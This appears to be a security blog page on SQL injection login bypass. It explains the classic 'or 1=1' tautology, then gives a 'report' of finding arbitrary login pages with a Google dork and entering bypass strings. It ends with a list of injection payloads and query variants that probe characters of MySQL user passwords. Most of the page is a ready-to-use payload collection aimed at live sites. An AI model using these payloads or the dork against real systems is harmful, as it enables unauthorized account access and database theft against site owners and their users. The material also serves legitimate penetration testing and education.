top of page

This SmartAttack tests a web application's login mechanism. By sequentially injecting several SQL strings into username, password and other user inputted login information, the SmartAttack attempts to bypass the login process. Care is taken to not lockout the user account as the SmartAttack tests variants of strings on the password field.

Successful bypass is determined by page comparisons with a page that represents a successful login and one that represents a failure. When the injected response page matches a successful login page, the existence of a vulnerability is reported. When the page matches neither matches a successful login nor a failed login page, a warning is displayed. This warning indicates that there is potentially a potential vulnerability.    

theblackthreat
In general the way web applications construct SQL statements involving SQL syntax written by the programmers is mixed with user-supplied data. Example:
=>select title, text from news where id=$id

Because the way it was constructed, the user can supply crafted input trying to make the original SQL statement execute further actions of the user's choice. The example below illustrates the user-supplied data “10 or 1=1”, changing the logic of the SQL statement, modifying the WHERE clause adding a condition “or 1=1”.

 

=>select title, text from news where id=10 or 1=1

Standard SQL Injection Testing

​

Consider the following SQL query:

SELECT * FROM Users WHERE Username='$username' AND Password='$password'


A similar query is generally used from the web application in order to authenticate a user. If the query returns a value it means that inside the database a user with that set of credentials exists, then the user is allowed to login to the system, otherwise access is denied. The values of the input fields are generally obtained from the user through a web form. Suppose we insert the following Username and Password values:

​

$username = 1' or '1' = '1

$password = 1' or '1' = '1


The query will be:

SELECT * FROM Users WHERE Username='1' OR '1' = '1' AND Password='1' OR '1' = '1'

Report: SQL injection bypass

Firstly I've open the site with the help of google dork:

$Inurl:login.php site:[sepecify you site location]

Then I've open sites  and enter username and login

$username:'or'1'='1
$password:'or'1'='1
username and password >> admin'||' '==='
 
here some bypass query's you can you to bypass the login pages.

# Wide variety of logical requests.

and 1
or 1
and 1=1
and 2<3
and 'a'='a'
and 'a'<>'b'
and char(32)=' '
and 3<=2
and 5<=>4
and 5<=>5
and 5 is null
or 5 is not null
....
# An example of various request notations with the same meaning.

select user from mysql.user where user = 'user' OR mid(password,1,1)='*'
select user from mysql.user where user = 'user' OR mid(password,1,1)=0x2a
select user from mysql.user where user = 'user' OR mid(password,1,1)=unhex('2a')
select user from mysql.user where user = 'user' OR mid(password,1,1) regexp '[*]'
select user from mysql.user where user = 'user' OR mid(password,1,1) like '*'
select user from mysql.user where user = 'user' OR mid(password,1,1) rlike '[*]'
select user from mysql.user where user = 'user' OR ord(mid(password,1,1))=42
select user from mysql.user where user = 'user' OR ascii(mid(password,1,1))=42
select user from mysql.user where user = 'user' OR find_in_set('2a',hex(mid(password,1,1)))=1
select user from mysql.user where user = 'user' OR position(0x2a in password)=1
select user from mysql.user where user = 'user' OR locate(0x2a,password)=1
©2022 www.theblackthreat.in All right reserved.
bottom of page